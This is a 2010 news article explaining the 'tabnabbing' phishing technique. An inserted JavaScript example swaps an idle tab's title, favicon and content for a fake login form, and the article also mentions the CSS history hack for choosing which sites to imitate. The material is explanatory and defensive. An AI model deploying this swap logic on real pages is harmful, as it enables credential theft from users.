Dubs the attack "tabnabbing"

May 25, 2010 14:52 GMT  ·  By

Mozilla's Creative Lead for Firefox, Aza Raskin, has devised a new phishing method that capitalizes on users' lack of attention to the order and content of their browser's tabs. Called "tabnabbing," the attack uses JavaScript to alter the content of a page that is already open in a browser tab, once the user has moved away from it.

"Most phishing attacks depend on an original deception. If you detect that you are at the wrong URL, or that something is amiss on a page, the chase is up. You’ve escaped the attackers. In fact, the time that wary people are most wary is exactly when they first navigate to a site. What we don’t expect is that a page we’ve been looking at will change behind our backs, when we aren’t looking. That’ll catch us by surprise," Mr. Raskin explains on his blog.

The attack proposed by the design expert has a Web page detect when the user switches away from it and then deceptively change its appearance. The booby-trapped page doesn't even have to be a rogue one. It can be part of a legitimate website that has been compromised via a technique that allows code injection, such as cross-site scripting.

In order to achieve the best result, attackers can go as far as silently replacing the favicon and title the tab displays. Raskin's proof-of-concept, embedded in the blog post describing the method, has the page imitate the Gmail login page if the user spends more than five seconds on a different tab. A user returning to the original tab later could thus be tricked into thinking they had been logged out of their mailbox and attempt to authenticate again.
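To make the mechanics concrete, here is an added example of the timing and swap logic behind such a page. It is not Raskin's proof-of-concept and not code from his blog; it is written so the logic runs under Node against a stand-in document, with the browser wiring kept in a separate function. The names (createTabnabber, FakeDocument, DECOY, manualClock, runScenario), the placeholder decoy content and the favicon URLs are assumptions; the five-second delay follows the article.

```javascript
// Added example, not Raskin's PoC: tabnabbing timing and swap logic.
// Assumed names throughout; DECOY is a constructed placeholder, not a real login page.
const DELAY_MS = 5000; // the article's "more than five seconds"

const DECOY = {
  title: "Sign in to your mailbox",            // constructed placeholder title
  favicon: "https://example.com/decoy.ico",    // constructed placeholder favicon
  body: '<form id="login"><input name="user"><input name="pass" type="password"></form>',
};

// Stand-in for the parts of `document` the attack touches. In a browser you
// would pass the real `document` (title, <link rel="icon">, body.innerHTML).
class FakeDocument {
  constructor({ title, favicon, body }) {
    this.title = title;
    this.favicon = favicon;
    this.body = body;
    this.hidden = false;
  }
}

function createTabnabber(doc, decoy, { delayMs = DELAY_MS, setTimer = setTimeout, clearTimer = clearTimeout } = {}) {
  const original = { title: doc.title, favicon: doc.favicon, body: doc.body };
  let timer = null;
  let swapped = false;

  function apply(state) {
    doc.title = state.title;
    doc.favicon = state.favicon; // real page: replace the <link rel="icon"> node, browsers may not re-read href in place
    doc.body = state.body;
  }

  return {
    // Tab lost focus (blur, or visibilitychange -> hidden): start the clock.
    onHidden() {
      if (swapped || timer !== null) return;
      timer = setTimer(() => { timer = null; swapped = true; apply(decoy); }, delayMs);
    },
    // User came back before the clock ran out: stand down, nothing has changed.
    // Once swapped, returning does NOT restore: the decoy must be there when the user looks.
    onVisible() {
      if (timer !== null) { clearTimer(timer); timer = null; }
    },
    restore() { apply(original); swapped = false; },
    isSwapped: () => swapped,
    isArmed: () => timer !== null,
  };
}

// Browser wiring (not executed under Node). Raskin's 2010 demo relied on blur/focus;
// the Page Visibility API gives the same signal in newer browsers.
function attach(nabber, doc = globalThis.document, win = globalThis.window) {
  doc.addEventListener("visibilitychange", () => (doc.hidden ? nabber.onHidden() : nabber.onVisible()));
  win.addEventListener("blur", () => nabber.onHidden());
  win.addEventListener("focus", () => nabber.onVisible());
}

// Manual clock so the sequence can be replayed deterministically (harness, not attack code).
function manualClock() {
  const pending = new Map();
  let nextId = 1;
  let now = 0;
  return {
    setTimer(fn, ms) { const id = nextId++; pending.set(id, { at: now + ms, fn }); return id; },
    clearTimer(id) { pending.delete(id); },
    advance(ms) {
      now += ms;
      for (const [id, t] of [...pending]) if (t.at <= now) { pending.delete(id); t.fn(); }
    },
  };
}

// Scenario from the article: the user leaves the tab for `awayMs`, then comes back.
function runScenario(awayMs) {
  const clock = manualClock();
  const doc = new FakeDocument({ title: "Harmless page", favicon: "https://example.com/favicon.ico", body: "<p>hello</p>" });
  const nabber = createTabnabber(doc, DECOY, { setTimer: clock.setTimer, clearTimer: clock.clearTimer });
  nabber.onHidden();
  clock.advance(awayMs);
  nabber.onVisible();
  return { swapped: nabber.isSwapped(), title: doc.title, favicon: doc.favicon, armed: nabber.isArmed() };
}
```

Note what the script cannot touch: the address bar. Title, favicon and body are all under the page's control, but the URL shown for the tab stays that of the page that was originally loaded, which is why re-reading the URL before typing a password into a tab you return to is the one check that defeats this attack.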

There are also other social engineering tricks or hacks that can be employed to increase the attack's success rate. For example, phishers can make the attack more user-specific by using the CSS history hack (reading the styling of :visited links) to determine which sensitive websites someone has recently visited, and imitate those.

Raskin points out that there are also various methods of determining whether a user is currently logged into a specific service, which can then be targeted. Furthermore, if the victim tries to authenticate via the fake login form, the page can forward them to the real site, where they will appear to be logged in because their session there is still active, so nothing looks amiss.

Some people might ask why Mozilla's Creative Lead is describing new phishing methods on his blog. Apparently, it is to underline the need for an easier and more secure approach to online authentication. In this respect, Mozilla is developing a new browser feature and protocol specification called the Account Manager, which will let users see their login state and authenticate on their favorite websites from a common interface.